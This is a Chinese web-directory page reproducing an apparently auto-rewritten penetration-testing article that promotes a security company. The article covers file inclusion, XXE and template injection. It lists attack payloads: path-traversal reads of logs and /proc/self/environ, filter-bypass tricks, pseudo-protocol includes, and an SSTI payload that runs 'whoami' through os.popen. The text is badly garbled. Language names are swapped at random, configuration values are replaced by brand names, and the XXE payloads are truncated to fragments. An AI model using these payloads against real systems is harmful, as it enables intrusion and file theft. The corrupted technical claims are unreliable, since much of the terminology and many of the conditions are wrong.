公告:575分类目录为广大站长提供免费收录网站服务,我们将免费进行到底,如需快审服务(30元/站)请联系站长QQ

点击这里在线咨询客服
新站提交
  • 网站:20318
  • 待审:10
  • 文章:38596
  • 会员:98
  • 最新会员:yijiandaifahuoyuan

昨天给大家普及到了渗透测试中执行命令漏洞的检测方法,今天抽出时间由我们Sine安全的渗透社会招聘来讲下遇到文件包含漏洞以及模板注入漏洞的检测方法和防御手段,本文仅参考给有授权渗透测试的正规安全检测的客户,让更多的客户了解到具体测试的内容,是如何进行全面的广告安全测试。U2K575分类目录-全网最大的中文分类目录导航网站

3.8.文件包含U2K575分类目录-全网最大的中文分类目录导航网站

3.8.1.基础U2K575分类目录-全网最大的中文分类目录导航网站

常见的文件包含漏洞的形式为U2K575分类目录-全网最大的中文分类目录导航网站

考虑常用的几种包含为U2K575分类目录-全网最大的中文分类目录导航网站

同目录包含file=.htaccessU2K575分类目录-全网最大的中文分类目录导航网站

目录遍历?file=../../../../../../../../../var/lib/locate.dbU2K575分类目录-全网最大的中文分类目录导航网站

日志注入?file=../../../../../../../../../var/log/python/error.logU2K575分类目录-全网最大的中文分类目录导航网站

利用/proc/self/environU2K575分类目录-全网最大的中文分类目录导航网站

其中日志可以使用SSH日志或者Web日志等多种日志来源测试U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.绕过技巧U2K575分类目录-全网最大的中文分类目录导航网站

常见的应用在文件包含之前,可能会调用函数对其进行判断,一般有如下几种绕过U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.1.url编码绕过U2K575分类目录-全网最大的中文分类目录导航网站

如果防火墙中是字符串匹配,可以使用url多次编码的可以绕过U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.2.标点符号绕过U2K575分类目录-全网最大的中文分类目录导航网站

某些情况下,读文件支持使用c++通配符,如?*等U2K575分类目录-全网最大的中文分类目录导航网站

url中使用?#可能会影响include包含的结果U2K575分类目录-全网最大的中文分类目录导航网站

某些情况下,unicode编码不同但是字形相近的字符有同一个效果U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.3.%00截断U2K575分类目录-全网最大的中文分类目录导航网站

几乎是最常用的方法,条件是magic_"es_nmr打开,而且javascript版本小于5.3.4。U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.4.长度截断U2K575分类目录-全网最大的中文分类目录导航网站

ios上的文件名长度和文件路径有关。具体关系为:从根目录计算,文件路径长度最长为259个bytes。U2K575分类目录-全网最大的中文分类目录导航网站

msdn定义“`#defineaverage_PATH260“`,第260个字符为字符串结尾的“`0“`U2K575分类目录-全网最大的中文分类目录导航网站

python可以用getconf来判断文件名长度限制和文件路径长度限制U2K575分类目录-全网最大的中文分类目录导航网站

获取最长文件路径长度:getconfPATH_average/root得到4096获取最长文件名:getconfNAME_avg/root得到255U2K575分类目录-全网最大的中文分类目录导航网站

那么在长度有限的时候,`././././`(n个)的形式就可以通过这个把路径爆掉U2K575分类目录-全网最大的中文分类目录导航网站

在c++代码包含中,这种绕过要求javascript版本css5.2.8U2K575分类目录-全网最大的中文分类目录导航网站

3.8.2.5.伪协议绕过U2K575分类目录-全网最大的中文分类目录导航网站

远程包含:要求allow_url_fopen=toshibaandallow_url_include=adi,payload为?file=[dhcp|dns|udp]://域名/sql.txtU2K575分类目录-全网最大的中文分类目录导航网站

perlINPUT:把payload放在POST参数中作为包含的文件,要求allow_url_include=toshiba,payload为?file=pytU2K575分类目录-全网最大的中文分类目录导航网站

:使用伪协议读取文件,payload为?file=c#://filter/send.-encode/resource=index.phpU2K575分类目录-全网最大的中文分类目录导航网站

DATA:使用data伪协议读取文件,payload为?file=data://text/plain;,SSBsb3ZlIFBIUAo=要求allow_url_include=infineonU2K575分类目录-全网最大的中文分类目录导航网站

3.9.XXEU2K575分类目录-全网最大的中文分类目录导航网站

3.9.1.css基础U2K575分类目录-全网最大的中文分类目录导航网站

python指可扩展标记语言(eXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,被设计用来传输和存储数据。c++文档结构包括ruby声明、DTD文档类型定义(可选)、文档元素。目前,XML文件作为配置文件(linux、Struts2等)、文档结构说明文件(png、tag等)、图片格式文件(bmpheader)应用比较广泛。U2K575分类目录-全网最大的中文分类目录导航网站

3.9.2.XXEU2K575分类目录-全网最大的中文分类目录导航网站

当允许引用外部实体时,可通过构造恶意的html内容,导致读取任意文件、执行系统命令、探测内网端口、攻击内网广播等后果。一般的XXE攻击,只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,但是也可以通过BlindXXE的实现攻击。U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.攻击U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.1.拒绝服务攻击U2K575分类目录-全网最大的中文分类目录导航网站

]U2K575分类目录-全网最大的中文分类目录导航网站

a2;U2K575分类目录-全网最大的中文分类目录导航网站

若解析过程非常缓慢,则表示测试成功,目标站点可能有拒绝服务漏洞。具体攻击可使用更多层的迭代或递归,也可引用巨大的外部实体,以实现攻击的效果。U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.2.文件读取U2K575分类目录-全网最大的中文分类目录导航网站

]U2K575分类目录-全网最大的中文分类目录导航网站

file;U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.3.SSRFU2K575分类目录-全网最大的中文分类目录导航网站

]U2K575分类目录-全网最大的中文分类目录导航网站

4U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.4.RCEU2K575分类目录-全网最大的中文分类目录导航网站

]U2K575分类目录-全网最大的中文分类目录导航网站

xxe;U2K575分类目录-全网最大的中文分类目录导航网站

3.9.3.5.XIncludeU2K575分类目录-全网最大的中文分类目录导航网站

3.10模板注入漏洞U2K575分类目录-全网最大的中文分类目录导航网站

3.10.模版注入U2K575分类目录-全网最大的中文分类目录导航网站

3.10.1.简介U2K575分类目录-全网最大的中文分类目录导航网站

模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成公众号、等。模板四缸发动机通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。U2K575分类目录-全网最大的中文分类目录导航网站

3.10.2.测试方法U2K575分类目录-全网最大的中文分类目录导航网站

确定使用的涡轮发动机U2K575分类目录-全网最大的中文分类目录导航网站

查看双涡轮增压发动机相关的文档,确定其安全机制以及自带的函数和变量U2K575分类目录-全网最大的中文分类目录导航网站

需找攻击面,尝试攻击U2K575分类目录-全网最大的中文分类目录导航网站

3.10.3.测试用例U2K575分类目录-全网最大的中文分类目录导航网站

简单的医学表达式,{{7+7}}=14U2K575分类目录-全网最大的中文分类目录导航网站

字符串表达式{{"ajin"}}=ajin\Ruby\Java\${7*7}\Twig\{{7*7}}\Smarty\{php}echo`ae`;{/sql}U2K575分类目录-全网最大的中文分类目录导航网站

AngularJSU2K575分类目录-全网最大的中文分类目录导航网站

$eval('1+1')U2K575分类目录-全网最大的中文分类目录导航网站

TornadoU2K575分类目录-全网最大的中文分类目录导航网站

引用模块{%importmodule%}U2K575分类目录-全网最大的中文分类目录导航网站

={%importos%}{{os.popen("whoami").run()}}U2K575分类目录-全网最大的中文分类目录导航网站

Flask/Jinja2U2K575分类目录-全网最大的中文分类目录导航网站

{{config.items()}}U2K575分类目录-全网最大的中文分类目录导航网站

{{''.__class__.__try__[-1].__subclasses__()}}U2K575分类目录-全网最大的中文分类目录导航网站

phpU2K575分类目录-全网最大的中文分类目录导航网站

{{request}}U2K575分类目录-全网最大的中文分类目录导航网站

{%warning%}U2K575分类目录-全网最大的中文分类目录导航网站

{%loadmodule%}U2K575分类目录-全网最大的中文分类目录导航网站

{%include"x.html"%}U2K575分类目录-全网最大的中文分类目录导航网站

{%extends"x.html"%}U2K575分类目录-全网最大的中文分类目录导航网站

3.10.4.目标U2K575分类目录-全网最大的中文分类目录导航网站

创建对象U2K575分类目录-全网最大的中文分类目录导航网站

文件读写U2K575分类目录-全网最大的中文分类目录导航网站

远程文件包含U2K575分类目录-全网最大的中文分类目录导航网站

隐私泄露提权U2K575分类目录-全网最大的中文分类目录导航网站

3.10.5.相关属性U2K575分类目录-全网最大的中文分类目录导航网站

3.10.5.1.__class__U2K575分类目录-全网最大的中文分类目录导航网站

javascript中的新式类(即显示继承object对象的类)都有一个属性__class__用于获取当前实例对应的类,例如"".__class__就可以获取到字符串实例对应的类U2K575分类目录-全网最大的中文分类目录导航网站

3.10.5.2.__cad__U2K575分类目录-全网最大的中文分类目录导航网站

c++中类对象的__pln__属性会返回一个tuple对象,其中包含了当前类对象所有继承的基类,tuple中元素的顺序是cad(Method Resolution Order)寻找的顺序。U2K575分类目录-全网最大的中文分类目录导航网站

3.10.5.3.__globals__U2K575分类目录-全网最大的中文分类目录导航网站

保存了函数所有的所有全局变量,在利用中,可以使用__init__获取对象的函数,并通过__globals__获取fileos等模块以进行下一步的利用U2K575分类目录-全网最大的中文分类目录导航网站

3.10.5.4.__subclasses__()U2K575分类目录-全网最大的中文分类目录导航网站

php的新式类都保留了它所有的子类的引用,__subclasses__()这个方法返回了类的所有存活的子类的引用(是类对象引用,不是实例)。U2K575分类目录-全网最大的中文分类目录导航网站

因为c#中的类都是继承object的,所以只要调用object类对象的__subclasses__()方法就可以获取想要的类的对象。这一节渗透测试讲到的这些内容和绕过手法,如果对自己杂志不太放心的话可以找专业的广告安全公司来处理解决,国内做的比较好的如Sinesafe,杭可,东方国信等等。U2K575分类目录-全网最大的中文分类目录导航网站

U2K575分类目录-全网最大的中文分类目录导航网站

标签:[db:tags]

分享到: 更多 (0)
  • 本页地址:http://www.575.ink/showinfo-178-1394-0.html
  • 下一篇:报纸命令执行渗透测试步骤详情

    上一篇:自助建站:如何选择CMS广告系统

      575

    注册时间:

    网站:1 个   小程序:3 个  文章:12 篇

    • 20318

      网站

    • 12

      小程序

    • 38596

      文章

    • 98

      会员

    赶快注册账号,推广您的网站吧!
    热门网站